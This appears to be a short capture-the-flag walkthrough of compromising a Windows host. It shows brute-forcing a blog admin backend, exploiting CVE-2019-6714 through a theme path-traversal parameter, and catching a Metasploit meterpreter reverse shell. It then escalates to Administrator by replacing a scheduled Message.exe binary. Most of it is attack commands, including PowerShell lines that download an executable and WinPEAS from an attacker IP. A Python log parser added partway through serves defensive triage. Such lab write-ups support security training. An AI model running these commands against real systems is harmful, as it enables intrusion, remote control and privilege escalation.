Brute-force the way into the admin backend
CVE-2019-6714
Exploit it directly to get a reverse shell
?theme=../../App_Data/files

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.17.6.173/shell-name.exe','shell-name.exe')"
msfconsole -qx 'use exploit/multi/handler;set lhost 10.17.6.173;set lport 10000;set payload windows/meterpreter/reverse_tcp;run'

Move over to msf

load powershell
powershell_shell
. .\PowerUp.ps1
Invoke-AllChecks


This service can be exploited

cd "c:\program files (x86)"

Then go into events

cat the log and take a look

S > cat 20198415519.INI_LOG.txt

08/04/19 15:06:01,Event Started Ok, (Administrator)
08/04/19 15:06:30,Process Ended. PID:2608,ExitCode:1,Message.exe (Administrator)
08/04/19 15:07:00,Event Started Ok, (Administrator)
08/04/19 15:07:34,Process Ended. PID:2680,ExitCode:4,Message.exe (Administrator)
08/04/19 15:08:00,Event Started Ok, (Administrator)
08/04/19 15:08:33,Process Ended. PID:2768,ExitCode:4,Message.exe (Administrator)
08/04/19 15:09:00,Event Started Ok, (Administrator)
08/04/19 15:09:34,Process Ended. PID:3024,ExitCode:4,Message.exe (Administrator)
08/04/19 15:10:00,Event Started Ok, (Administrator)
08/04/19 15:10:33,Process Ended. PID:1556,ExitCode:4,Message.exe (Administrator)
08/04/19 15:11:00,Event Started Ok, (Administrator)
08/04/19 15:11:33,Process Ended. PID:468,ExitCode:4,Message.exe (Administrator)
08/04/19 15:12:00,Event Started Ok, (Administrator)
08/04/19 15:12:33,Process Ended. PID:2244,ExitCode:4,Message.exe (Administrator)
08/04/19 15:13:00,Event Started Ok, (Administrator)
08/04/19 15:13:33,Process Ended. PID:1700,ExitCode:4,Message.exe (Administrator)
08/04/19 16:43:00,Event Started Ok,Can not display reminders while logged out. (SYSTEM_svc)*
08/04/19 16:44:01,Event Started Ok, (Administrator)
08/04/19 16:44:05,Process Ended. PID:2228,ExitCode:1,Message.exe (Administrator)
08/04/19 16:45:00,Event Started Ok, (Administrator)
08/04/19 16:45:20,Process Ended. PID:2640,ExitCode:1,Message.exe (Administrator)
08/04/19 16:46:00,Event Started Ok, (Administrator)
08/04/19 16:46:03,Process Ended. PID:2912,ExitCode:1,Message.exe (Administrator)
08/04/19 16:47:00,Event Started Ok, (Administrator)
08/04/19 16:47:24,Process Ended. PID:1944,ExitCode:1,Message.exe (Administrator)
08/04/19 16:48:01,Event Started Ok, (Administrator)
08/04/19 16:48:18,Process Ended. PID:712,ExitCode:1,Message.exe (Administrator)
08/04/19 16:49:00,Event Started Ok, (Administrator)
08/04/19 16:49:23,Process Ended. PID:1936,ExitCode:1,Message.exe (Administrator)

Message runs with Administrator privileges
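As an added example (not part of the original writeup), a small Python parser for the SystemScheduler INI_LOG format shown above that does the triage done by eye here: which binary the scheduler launches, under which account, how often, and with what exit codes. The sample log is constructed from the lines above, the date order is assumed to be MM/DD/YY, and the helper names are my own.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in the SystemScheduler *.INI_LOG.txt layout seen above (not a real capture).
SAMPLE_LOG = """08/04/19 15:06:01,Event Started Ok, (Administrator)
08/04/19 15:06:30,Process Ended. PID:2608,ExitCode:1,Message.exe (Administrator)
08/04/19 15:07:00,Event Started Ok, (Administrator)
08/04/19 15:07:34,Process Ended. PID:2680,ExitCode:4,Message.exe (Administrator)
08/04/19 16:43:00,Event Started Ok,Can not display reminders while logged out. (SYSTEM_svc)*
08/04/19 16:44:01,Event Started Ok, (Administrator)
08/04/19 16:44:05,Process Ended. PID:2228,ExitCode:1,Message.exe (Administrator)
"""

# Two record shapes: an event start (optional note, optional trailing "*") and a process end.
START_RE = re.compile(r"^(\d\d/\d\d/\d\d \d\d:\d\d:\d\d),Event Started Ok,(.*?) \((\S+)\)\*?$")
END_RE = re.compile(r"^(\d\d/\d\d/\d\d \d\d:\d\d:\d\d),Process Ended\. PID:(\d+),ExitCode:(-?\d+),(.+?) \((\S+)\)$")
TS_FMT = "%m/%d/%y %H:%M:%S"  # assumption: month/day/year ordering

def parse_log(text):
    """Yield (timestamp, kind, fields) for each recognised line; unknown lines are skipped."""
    for line in text.splitlines():
        m = START_RE.match(line)
        if m:
            yield datetime.strptime(m[1], TS_FMT), "start", {"note": m[2], "account": m[3]}
        elif (m := END_RE.match(line)):
            yield datetime.strptime(m[1], TS_FMT), "end", {
                "pid": int(m[2]), "exit": int(m[3]), "exe": m[4], "account": m[5]}

def summarize(text):
    """Per (exe, account): run count, exit codes seen, and shortest gap between event starts (the period)."""
    runs = defaultdict(lambda: {"count": 0, "exit_codes": set(), "interval_s": None})
    starts = defaultdict(list)
    for ts, kind, f in parse_log(text):
        if kind == "start":
            starts[f["account"]].append(ts)
        else:
            r = runs[(f["exe"], f["account"])]
            r["count"] += 1
            r["exit_codes"].add(f["exit"])
    for (_, account), r in runs.items():
        ts = sorted(starts[account])
        gaps = [int((b - a).total_seconds()) for a, b in zip(ts, ts[1:])]
        r["interval_s"] = min(gaps) if gaps else None
    return dict(runs)

def privileged_binaries(summary, privileged=("Administrator", "SYSTEM")):
    """Binaries launched under a privileged account: their file and directory ACLs must not be user-writable."""
    return sorted((exe, acct) for exe, acct in summary if acct in privileged)
```

Anything this lists under Administrator or SYSTEM is a binary whose file and parent-directory permissions should deny write and modify access to standard users.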

Replace this Message binary
cd "C:\program files (x86)\SystemScheduler\Message.exe"

Privilege escalation successful

powershell -c "Invoke-WebRequest -Uri 'http://10.17.6.173/WinPEAS.bat' -OutFile 'c:\windows\temp\winpeas.bat'"

One more note: windows\temp is world-writable